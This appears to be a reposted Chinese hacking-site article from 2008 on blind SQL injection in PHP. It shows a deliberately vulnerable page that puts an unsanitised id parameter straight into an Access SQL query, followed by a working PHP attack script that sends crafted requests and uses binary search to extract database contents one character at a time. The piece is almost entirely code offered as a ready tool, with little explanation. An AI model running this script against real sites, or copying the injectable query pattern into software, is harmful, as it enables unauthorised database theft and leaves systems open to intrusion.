|
|
 |
| PHP二分法注射猜解 |
| 作者:佚名 来源:转载 发布时间:2008-10-8 0:07:59 发布人:黑客动画吧 |
 减小字体  增大字体
来源:wolvez
b.php
PHP代码
- <?php
- $conn = new com("ADODB.Connection");
- $connstr = "DRIVER={Microsoft Access Driver (*.mdb)}; DBQ=". realpath("data.mdb");
-
- $conn->Open($connstr);
- $rs = new com("ADODB.RecordSet");
- $sql="select * from news where id=".$_GET[id];
- $rs->Open($sql,$conn,1,1);
- if(! $rs->eof) {
- echo "{ok}";
- } else{
- echo "{no}";
- }
- ?>
存在注射的。但是没有输出结果,只是判断是否存在。
PHP代码
- <?php
-
- error_reporting(7);
- ini_set('max_execution_time', 0);
-
- function send(){
- global $host,$cmd;
- //$cmd .= "";
- $message = "GET /b.php?id=".$cmd." HTTP/1.1\r\n";
- $message .= "Accept: */*\r\n";
- $message .= "Accept-Language: zh-cn\r\n";
- $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
- $message .= "Host: $host\r\n";
- $message .= "Connection: Close\r\n\r\n";
-
- $fp = fsockopen($host, 80);
- fputs($fp, $message);
-
- $resp = '';
-
- while ($fp && !feof($fp))
- $resp .= fread($fp, 1024);
- preg_match('/\{ok\}/', $resp, $pre);
- if ($pre) return true;
- }
-
- function Binsearch($sql){
- global $cmd;
- $low="32";
- $high="128";
- while($low<=$high){
- $mid=intval(($low+$high)/2);
- $cmd= $sql."=".$mid;
- echo "$mid";
- if(send()){echo "Lucky\r\n";return $mid;}
- $cmd= $sql."<".$mid;
- if(send()){
- $high=$mid-1;
- echo "Bigger\r\n";
- }else{
- $low=$mid+1;
- echo "Smaller\r\n";
- }
- }
- return(-1);
- }
-
- $host="127.0.0.1:8080";
- $sql="15%20and%20asc(left(name,1))";
- echo Binsearch($sql);
- ?>
|
|
| [
]
[返回上一页]
[打 印]
[收 藏] |
|
|
|
|
|
![]() |
|
设为首页
加入收藏
发布作品
栏目导航